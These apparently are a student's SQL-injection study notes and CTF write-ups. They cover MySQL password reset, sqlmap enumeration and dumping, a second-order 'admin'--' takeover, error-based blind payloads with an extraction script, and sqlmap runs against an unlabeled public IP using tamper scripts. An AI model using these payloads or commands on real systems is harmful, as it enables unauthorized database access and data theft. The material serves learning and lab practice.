
Today Lao Ji called us in for a talk and really put the pressure on, so it looks like we have to get serious about studying.

A senior said SQL is very important, and I think the place to start is how to set up a database!!

When you have forgotten the password and want to log into /phpMyAdmin

Logging into /phpMyAdmin

In the browser, open: http://localhost/phpMyAdmin/

Edit the configuration file

Stop the MySQL service first. Then find the MySQL configuration file (usually C:\ProgramData\MySQL\MySQL Server 8.0\my.ini) and add the following under the [mysqld] section:

```ini
[mysqld]
skip-grant-tables   # skip privilege checks (temporarily bypasses password authentication)
```

(Remember to stop the service before editing and start it again afterwards; the option is only read at startup.)

Caveat: with skip-grant-tables the server treats every connection as a fully privileged user with no password, so only do this on a local machine you control. MySQL 8.0 also enables skip-networking automatically in this mode, so remote clients cannot connect while it is on. Remove the line and restart the service as soon as the password has been reset.

```shell
mysqlsh -u root
```

(MySQL Shell starts in JavaScript mode; switch to SQL with \sql, or start it as mysqlsh --sql -u root. The classic mysql -u root client works just as well here.)

Logged in successfully:

(screenshot)

```sql
FLUSH PRIVILEGES;                                      # reload the grant tables; without this ALTER USER is refused under skip-grant-tables
ALTER USER 'root'@'localhost' IDENTIFIED BY 'root';    # set a new password
```

Logged in successfully

(screenshot)

Afterwards remove skip-grant-tables from my.ini again and restart the service. 'root' is a lab password; use something stronger on any machine that other people can reach.

Looking at an SQL file

(screenshot)

We exported a random SQL file and found:

the data is in there

(screenshot)

How do I import new data?

Method 1: import through phpMyAdmin
Method 2: import from the command line

```shell
mysql -u <username> -p <database name> < <file path>
```

(Use the classic mysql client for this, not mysqlsh: MySQL Shell starts in JavaScript mode and would need --sql before it will run a plain .sql file from stdin.)

Method 3: add the new data directly in the SQL file

(screenshot)

Then import that file:

```shell
mysql -u root -p challenges < C:\data\modified_dump.sql
```

(adjust the path to where the file is; challenges is the database name)

/phpMyAdmin

(screenshot)

(if there are duplicate rows, remember to delete them

(screenshot)

Imported successfully

Common mistake:

(screenshot)

Remember that there must not be two semicolons in a row: `;;` is an empty statement, and MySQL aborts the import with a syntax error when it reaches it.
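As an added example (not from the original notes), here is a small Python checker to run over a dump before feeding it to mysql. It flags the two problems above: empty statements caused by a doubled semicolon, and a repeated value in the first column of an INSERT (usually the primary key), which is what makes the import fail on duplicate rows. The statement splitter is deliberately simple (it only tracks single-quoted strings), and the sample dump is constructed for the example.

```python
import re

# Constructed sample dump: a doubled semicolon after the CREATE TABLE and a
# repeated primary key (id 2) in the INSERT that was appended by hand.
SAMPLE_DUMP = """
CREATE TABLE `users` (
  `id` int NOT NULL,
  `username` varchar(32) NOT NULL,
  PRIMARY KEY (`id`)
);;
INSERT INTO `users` VALUES (1,'admin'),(2,'bob');
INSERT INTO `users` VALUES (2,'carol'),(3,'it''s;dave');
"""


def split_statements(sql):
    """Split a dump into statements on ';' outside single-quoted strings.

    Empty statements are kept, so a doubled ';' shows up as an empty entry
    instead of silently disappearing.
    """
    statements, current, in_string = [], [], False
    i = 0
    while i < len(sql):
        ch = sql[i]
        if ch == "'":
            # '' inside a string is an escaped quote, not the end of the string
            if in_string and sql[i + 1:i + 2] == "'":
                current.append("''")
                i += 2
                continue
            in_string = not in_string
        if ch == ";" and not in_string:
            statements.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
        i += 1
    tail = "".join(current).strip()   # text after the last ';'
    if tail:
        statements.append(tail)
    return statements


INSERT_RE = re.compile(r"^INSERT\s+INTO\s+`?(\w+)`?\s+VALUES\s*(.*)$", re.I | re.S)
ROW_RE = re.compile(r"\(\s*([^,\)]+)")   # first value of each (...) tuple


def check_dump(sql):
    """Return a list of human-readable findings for the dump (empty = looks fine)."""
    findings = []
    seen = {}   # table -> set of first-column values already inserted
    for n, stmt in enumerate(split_statements(sql), 1):
        if stmt == "":
            findings.append(f"statement {n}: empty statement (doubled ';')")
            continue
        m = INSERT_RE.match(stmt)
        if not m:
            continue
        table, values = m.group(1), m.group(2)
        for key in ROW_RE.findall(values):
            key = key.strip()
            if key in seen.setdefault(table, set()):
                findings.append(f"statement {n}: duplicate key {key} in table {table}")
            seen[table].add(key)
    return findings


if __name__ == "__main__":
    for finding in check_dump(SAMPLE_DUMP):
        print(finding)
```

Run it on the real file with `check_dump(open("modified_dump.sql").read())`; an empty list means neither problem was found, although the splitter will not understand backslash-escaped quotes or `/* */` comments, so treat it as a quick sanity check rather than a parser.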

Using sqlmap

Kali ships with sqlmap:

(screenshot)

sqlmap syntax:

MySQL:

```shell
sqlmap -u 'http://xx/?id=1'                # plain GET parameter

sqlmap -u "http://test.com/login.php" --data="username=admin&password=pass"
# POST parameters
sqlmap -u <URL> --cookie=<COOKIE> --banner
# fingerprint the DBMS
sqlmap -u <URL> --dbs
# list the databases
sqlmap -u <URL> -D 'security' --tables
# list the tables of the <security> database
sqlmap -u <URL> -D 'security' -T 'users' --columns
# list the columns of the [users] table in the <security> database
sqlmap -u <URL> -D dvwa -T users -C "user_id,password" --dump
# dump specific columns
```

SQLite:

```shell
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" --tables
# list tables (SQLite has no databases to list first)

sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" -T flag --columns
# list columns

sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" -T flag -C flag --dump
# dump the column itself
```

Note on --cookie: sqlmap sends the string verbatim as the Cookie request header, so it has to contain the cookie name as well (session=...), not just the value; with a bare value the server never sees a session and sqlmap later asks whether to adopt the cookie the server sets itself.

Another way:

```shell
sqlmap -r /home/flitar/桌面/bp/bp.txt
# put the raw request captured in Burp into bp.txt
```

Output:

```
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
# run only the basic UNION tests
# Y = yes, n = no

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
# it looks like MySQL; test only for MySQL?
# Y = yes

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
# run the full MySQL test set, or stay at level 1 / risk 1?
# Y = full scan, n = stay at level 1

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
# `id` is confirmed as an injection point; keep looking for other injection points?
# y = yes, N = no

got a 302 redirect to 'http://node4.anna.nssctf.cn:28655/home'. Do you want to follow? [Y/n]
# a 302 redirect happened; follow it?
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
# resend the POST data to the redirect target?
you have not declared cookie(s), while server wants to set its own ('session=eyJyb2xlIjo..._io5XcUlGw'). Do you want to use those [Y/n]
# the server set a cookie of its own; use it from now on?
```

Each of these prompts has a command-line equivalent, so a scripted run does not need to answer them: --batch takes the default for every prompt, --dbms=mysql settles the DBMS question, --level and --risk set the test depth, and --cookie declares the cookie up front (the last prompt only appears because no cookie was declared).

Take sqli-labs as an example:

```shell
sqlmap -u 'http://172.29.37.209/sqli-labs-master/Less-3/?id=1'
```

Result:

(screenshot)

```
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 3903=3903 AND ('ytjT'='ytjT

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1') AND GTID_SUBSET(CONCAT(0x7176707071,(SELECT (ELT(8776=8776,1))),0x717a767071),8776) AND ('aYiq'='aYiq

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 5362 FROM (SELECT(SLEEP(5)))GuAf) AND ('DXUK'='DXUK

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4852') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,0x654c714b6763476b4d5156415a654344735065456a6f57784f67414475716f4e654c7249597a7754,0x717a767071)-- -
---
```

(Every payload starts with `1')`, which tells us Less-3 wraps the parameter in ('...') and sqlmap had to close both the quote and the parenthesis.)

Once injection is confirmed, just go on:

```shell
sqlmap -u 'http://172.29.37.209/sqli-labs-master/Less-3/?id=1' --dbs
```

(screenshot)

Success

POST request test: ([NSSRound#1 Basic]sql_by_sql

First use a second-order overwrite to get logged in to the **admin** page:

```
#1. register the user: admin'--

#2. change the password of admin'--

#3. log in as admin
```

This works because the password-change query concatenates the username from the session into the SQL: for the user admin'-- the WHERE clause becomes username='admin'-- ..., the comment swallows the rest, and the row that gets the new password is the real admin.

(screenshot)
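An added example, not code from the challenge, that reproduces the three steps above against an in-memory SQLite database. The table layout and the exact shape of the password-change query are assumptions about how the app must be built for the trick to work; the point is the contrast between the concatenated UPDATE and the parameterized one.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the challenge's user table (names are assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role INTEGER)")
    db.execute("INSERT INTO users VALUES ('admin', 'real-admin-secret', 1)")
    return db


def register(db, username, password):
    # Registration is parameterized, so admin'-- is stored literally as a new user.
    db.execute("INSERT INTO users VALUES (?, ?, 0)", (username, password))


def change_password_vulnerable(db, session_username, new_password):
    # The username comes from the signed session, so the developer treats it as
    # trusted and concatenates it. For admin'--  the query becomes
    #   UPDATE users SET password='...' WHERE username='admin'-- '
    # and the comment removes the closing quote: the real admin gets updated.
    sql = f"UPDATE users SET password='{new_password}' WHERE username='{session_username}'"
    db.execute(sql)


def change_password_safe(db, session_username, new_password):
    # Parameterized version: the whole username is one string value, comment included.
    db.execute("UPDATE users SET password=? WHERE username=?", (new_password, session_username))


def login(db, username, password):
    """Return the role of the matching user, or None if the credentials are wrong."""
    row = db.execute("SELECT role FROM users WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None


def takeover(change_password):
    """Run the write-up's three steps against a given change_password implementation.

    Returns the role obtained by logging in as 'admin' with the attacker's
    password, or None when the takeover did not work.
    """
    db = build_db()
    register(db, "admin'-- ", "whatever")            # step 1: register admin'--
    change_password(db, "admin'-- ", "pwned123")    # step 2: change that user's password
    return login(db, "admin", "pwned123")            # step 3: log in as admin


if __name__ == "__main__":
    print("vulnerable:", takeover(change_password_vulnerable))   # 1 = admin role
    print("safe:      ", takeover(change_password_safe))         # None
```

The trailing space in `admin'-- ` matters for MySQL, where `--` only starts a comment when followed by whitespace; SQLite accepts `--` either way.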

We captured a special route:

(screenshot)

Testing it with sqlmap:

```shell
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY"
```

The POST test needs the session cookie, because /query is only reachable as the logged-in admin. This is a Flask-style signed session cookie: its first segment base64-decodes to {"role":1,"username":"admin"}, and the signature is why we could not just forge it and had to take over the account first.

(screenshot)

Normally the next step would be:

```shell
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" --dbs
```

but the backend is SQLite, which has no concept of separate databases, so go straight to the tables:

```shell
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" --tables
```

(screenshot)

List the columns:

```shell
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" -T flag --columns
```

Then the value itself:

(screenshot)
SQL injection:

Testing whether the parameter is injectable:

```sql
-if(1=1,1,exp(710))
-if(1=2,1,exp(710))
```

(appended to the numeric parameter, e.g. id=1-if(...). When the condition is true the expression evaluates to 1 and the page renders normally; when it is false MySQL evaluates exp(710), which overflows DOUBLE and raises an error (exp(709) is the largest value that still fits). The error itself is the boolean oracle.)

(screenshot)

Brute-forcing values character by character

```sql
||if(substr(user(),1,1)='x',1,exp(710))||
```

```sql
descs=1/(ascii(substr(user,1,1))-97)
-- use a division-by-zero error: the server only errors when the character is 'a' (97)
```

(This second form is for PostgreSQL, where `user` without parentheses is the current user and division by zero raises an error. In a MySQL SELECT 1/0 just returns NULL, so on MySQL stick to the exp() trick.)
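An added example (not part of the original notes) that turns the single-character test above into a complete extraction loop. Instead of testing one character with `=`, it uses the MySQL payload `1-if(ascii(substr(user(),N,1))>C,1,exp(710))` and binary-searches the ASCII range, so each character costs at most seven requests; the page errors exactly when the condition is false. The HTTP part is left to the reader: `oracle(pos, threshold)` should send the payload and return True when the response is the normal page. A simulated oracle with a constructed secret stands in for the target so the code runs offline.

```python
def mysql_payload(pos, threshold):
    """Payload for a numeric parameter (id=1 becomes id=1-if(...)).

    The page renders normally when ascii(substr(user(),pos,1)) > threshold and
    errors out (DOUBLE value is out of range in exp(710)) otherwise.
    """
    return f"1-if(ascii(substr(user(),{pos},1))>{threshold},1,exp(710))"


def extract(oracle, max_len=64):
    """Recover a string through an error-based boolean oracle.

    oracle(pos, threshold) must return True when the character at 1-based
    position pos has an ASCII code greater than threshold (i.e. no error).
    Past the end of the string MySQL's substr() returns '' and ascii('') is 0,
    so the search converges to 0 and we stop there.
    """
    result = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127           # invariant: lo <= code <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, mid):  # code > mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result.append(chr(lo))
    return "".join(result)


def simulated_oracle(secret):
    """Stand-in for the target that answers exactly as the MySQL condition would.

    In a real test this is where mysql_payload(pos, threshold) goes into the
    HTTP request and the response is classified as error / no error.
    """
    calls = {"n": 0}

    def oracle(pos, threshold):
        calls["n"] += 1
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return code > threshold

    oracle.calls = calls
    return oracle


if __name__ == "__main__":
    o = simulated_oracle("root@localhost")   # constructed secret, not a real target
    print(extract(o), "recovered in", o.calls["n"], "requests")
    print("example payload:", mysql_payload(1, 64))
```

The same loop works for the PostgreSQL division form from the notes if the payload is changed to `1/((ascii(substr(user,N,1))>C)::int)`, which divides by zero exactly when the comparison is false. Replace `user()` with any other expression (a subquery selecting a column value, for instance) to dump data the same way.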
```shell
sqlmap "http://120.79.142.29:8098/api/jobJdbcDatasource?current=1&size=10&descs=1" --dbms=postgresql --method=GET --level=5 --technique=E --time-sec=5 -p descs --headers="Tecode: 1011122" --batch --dbs

sqlmap "http://120.79.142.29:8098/api/jobJdbcDatasource?current=1&size=10&descs=1" --dbms=postgresql --method=GET --level=5 --risk=3 --time-sec=5 -p descs --headers="Tecode: 1011122" --dbs --tamper=space2comment,charencode,randomcase
# --headers adds an extra request header; it can be left out or extended as needed
# -p descs restricts testing to the injectable parameter, --technique=E is error-based only
```